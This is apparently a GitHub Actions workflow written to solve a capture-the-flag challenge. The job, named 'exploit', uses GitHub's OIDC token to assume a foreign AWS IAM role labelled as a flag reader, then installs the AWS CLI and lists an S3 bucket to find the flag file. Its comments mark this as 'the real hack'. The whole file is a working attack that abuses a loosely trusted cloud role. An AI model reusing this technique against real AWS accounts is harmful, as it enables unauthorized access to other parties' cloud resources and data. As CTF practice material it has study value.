name: List The Files

on:
  push:
    branches: [ main ]
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Assume Target AWS Role
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875"
          role-session-name: Hacker-Session-${{ github.run_id }}
          aws-region: "ap-southeast-1"

      - name: Install AWS CLI (Manual Install)
        run: |
          curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
          unzip awscliv2.zip
          sudo ./aws/install

      # --- [THE REAL HACK] We LIST the files to find the real name! ---
      - name: List All Files in Bucket
        run: |
          echo "Listing all files in s3://oh-i-dont-care/ ..."
          # This will show us the REAL name of the flag
          aws s3 ls s3://oh-i-dont-care/
          
          echo "--- LISTING COMPLETE ---"
